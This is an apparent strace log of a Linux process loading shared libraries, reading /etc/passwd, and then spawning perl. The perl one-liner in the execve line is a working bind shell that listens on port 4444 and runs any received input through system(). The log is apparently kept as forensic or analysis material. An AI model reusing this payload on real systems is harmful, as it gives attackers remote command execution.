\4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5247  07:08:17.700351 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

5247  07:08:17.700370 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d49000

5247  07:08:17.700381 mmap2(0xb7d5d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d5d000

5247  07:08:17.700397 mmap2(0xb7d5f000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d5f000

5247  07:08:17.700411 close(1)          = 0

5247  07:08:17.700437 munmap(0xb7eef000, 29913) = 0

5247  07:08:17.700454 open("/etc/ld.so.cache", O_RDONLY) = 1

5247  07:08:17.700467 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5247  07:08:17.700483 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7eef000

5247  07:08:17.700493 close(1)          = 0

5247  07:08:17.700504 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.700518 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5247  07:08:17.700532 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5247  07:08:17.700622 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5247  07:08:17.700639 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d3f000

5247  07:08:17.700651 mmap2(0xb7d47000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d47000

5247  07:08:17.700667 close(1)          = 0

5247  07:08:17.700679 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.700692 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5247  07:08:17.700710 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5247  07:08:17.700849 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5247  07:08:17.700867 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d34000

5247  07:08:17.700879 mmap2(0xb7d3d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d3d000

5247  07:08:17.700896 close(1)          = 0

5247  07:08:17.700917 munmap(0xb7eef000, 29913) = 0

5247  07:08:17.700933 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5247  07:08:17.700947 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5247  07:08:17.700959 _llseek(1, 0, [0], SEEK_CUR) = 0

5247  07:08:17.700971 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5247  07:08:17.700987 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7ef6000

5247  07:08:17.701019 _llseek(1, 1624, [1624], SEEK_SET) = 0

5247  07:08:17.701034 munmap(0xb7ef6000, 1624) = 0

5247  07:08:17.701058 close(1)          = 0

5247  07:08:17.701087 getpgrp()         = 3831

5247  07:08:17.701097 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5247  07:08:17.701112 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5247  07:08:17.701129 brk(0x8101000)    = 0x8101000

5247  07:08:17.701160 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5247  07:08:17.701174 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5247  07:08:17.701189 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5247  07:08:17.701226 brk(0x8102000)    = 0x8102000

5247  07:08:17.701253 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5247  07:08:17.701303 stat64("/sbin/AB", 0xbfd6abb8) = -1 ENOENT (No such file or directory)

5247  07:08:17.701317 stat64("/bin/AB", 0xbfd6abb8) = -1 ENOENT (No such file or directory)

5247  07:08:17.701343 stat64("/usr/sbin/AB", 0xbfd6abb8) = -1 ENOENT (No such file or directory)

5247  07:08:17.701355 stat64("/usr/bin/AB", 0xbfd6abb8) = -1 ENOENT (No such file or directory)

5247  07:08:17.701368 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5247  07:08:17.701383 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d6a6f8) = 5248

5248  07:08:17.701430 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5248  07:08:17.701447 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5248  07:08:17.701460 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5248  07:08:17.701472 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5248  07:08:17.701488 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5248  07:08:17.701503 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5248  07:08:17.701516 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5248  07:08:17.701571 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5248  07:08:17.701585 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5248  07:08:17.701654 exit_group(127)   = ?

5247  07:08:17.707478 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5247  07:08:17.707634 --- SIGCHLD (Child exited) @ 0 (0) ---

5247  07:08:17.707685 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5248

5247  07:08:17.707773 waitpid(-1, 0xbfd6a838, WNOHANG) = -1 ECHILD (No child processes)

5247  07:08:17.707818 sigreturn()       = ? (mask now [])

5247  07:08:17.707854 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5247  07:08:17.707877 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5247  07:08:17.707889 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5247  07:08:17.707901 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5247  07:08:17.707919 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5247  07:08:17.707931 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5247  07:08:17.707965 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5247  07:08:17.707984 stat64("/sbin/perl", 0xbfd6abe8) = -1 ENOENT (No such file or directory)

5247  07:08:17.707997 stat64("/bin/perl", 0xbfd6abe8) = -1 ENOENT (No such file or directory)

5247  07:08:17.708008 stat64("/usr/sbin/perl", 0xbfd6abe8) = -1 ENOENT (No such file or directory)

5247  07:08:17.708020 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5247  07:08:17.708037 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5247  07:08:17.708062 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5247  07:08:17.708076 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d6a6f8) = 5249

5249  07:08:17.708169 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5249  07:08:17.708187 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5249  07:08:17.708214 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5249  07:08:17.708226 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5249  07:08:17.708241 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5249  07:08:17.708257 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5249  07:08:17.708269 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5249  07:08:17.708303 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5249  07:08:17.717119 brk(0)            = 0x8153000

5249  07:08:17.717119 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5249  07:08:17.717119 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f32000

5249  07:08:17.717119 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5249  07:08:17.717120 open("/etc/ld.so.cache", O_RDONLY) = 1

5249  07:08:17.717124 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5249  07:08:17.717142 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f2a000

5249  07:08:17.717153 close(1)          = 0

5249  07:08:17.717164 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5249  07:08:17.717180 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5249  07:08:17.717194 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5249  07:08:17.717293 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5249  07:08:17.717325 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f26000

5249  07:08:17.717380 mmap2(0xb7f28000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f28000

5249  07:08:17.717398 close(1)          = 0

5249  07:08:17.717410 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5249  07:08:17.717425 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5249  07:08:17.717440 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5249  07:08:17.717541 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5249  07:08:17.717558 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f01000

5249  07:08:17.717570 mmap2(0xb7f24000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f24000

5249  07:08:17.717586 close(1)          = 0

5249  07:08:17.717597 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5249  07:08:17.717611 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5249  07:08:17.717625 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5249  07:08:17.717712 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5249  07:08:17.717729 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f00000

5249  07:08:17.717742 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee8000

5249  07:08:17.717753 mmap2(0xb7efc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7efc000

5249  07:08:17.717767 mmap2(0xb7efe000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7efe000

5249  07:08:17.717781 close(1)          = 0

5249  07:08:17.717796 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5249  07:08:17.717820 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5249  07:08:17.717862 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5249  07:08:17.717965 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5249  07:08:17.717984 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d99000

5249  07:08:17.717995 mmap2(0xb7ee2000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ee2000

5249  07:08:17.718011 mmap2(0xb7ee5000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee5000

5249  07:08:17.718024 close(1)          = 0

5249  07:08:17.718037 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5249  07:08:17.718050 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5249  07:08:17.718064 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5249  07:08:17.718154 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5249  07:08:17.718171 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d67000

5249  07:08:17.718182 mmap2(0xb7d70000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d70000

